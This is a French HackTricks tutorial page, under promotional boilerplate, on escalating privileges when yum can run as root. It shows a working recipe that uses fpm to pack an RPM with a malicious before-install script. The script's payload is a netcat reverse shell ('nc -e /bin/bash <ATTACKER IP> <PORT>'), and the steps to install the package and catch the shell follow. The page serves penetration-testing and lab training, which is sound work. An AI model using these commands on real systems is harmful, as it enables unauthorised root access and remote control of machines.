3.3 KiB
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les PLANS D'ABONNEMENT !
-
Découvrez La famille PEASS, notre collection exclusive de NFTs
-
Obtenez le swag officiel PEASS & HackTricks
-
Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez moi sur Twitter 🐦@carlospolopm.
-
Partagez vos astuces de piratage en soumettant des PR au repo hacktricks et au repo hacktricks-cloud.
D'autres exemples autour de yum peuvent également être trouvés sur gtfobins.
Exécution de commandes arbitraires via les paquets RPM
Vérification de l'environnement
Pour exploiter cette vulnérabilité, l'utilisateur doit être en mesure d'exécuter des commandes yum en tant qu'utilisateur à privilèges élevés, c'est-à-dire root.
Un exemple de travail de cette vulnérabilité
Un exemple de travail de cette vulnérabilité peut être trouvé dans la salle daily bugle sur tryhackme.
Emballage d'un RPM
Dans la section suivante, je vais couvrir l'emballage d'un shell inversé dans un RPM en utilisant fpm.
L'exemple ci-dessous crée un paquet qui inclut un déclencheur avant l'installation avec un script arbitraire qui peut être défini par l'attaquant. Lorsqu'il est installé, ce paquet exécutera la commande arbitraire. J'ai utilisé un exemple de shell netcat inversé simple à des fins de démonstration, mais cela peut être modifié selon les besoins.
EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR
Obtenir un shell
En utilisant l'exemple ci-dessus et en supposant que yum
peut être exécuté en tant qu'utilisateur à privilèges élevés :
- Transférez le fichier rpm sur l'hôte
- Démarrez un écouteur sur votre hôte local tel que l'exemple d'écouteur netcat
- Installez le package vulnérable
yum localinstall -y exploited-1.0-1.noarch.rpm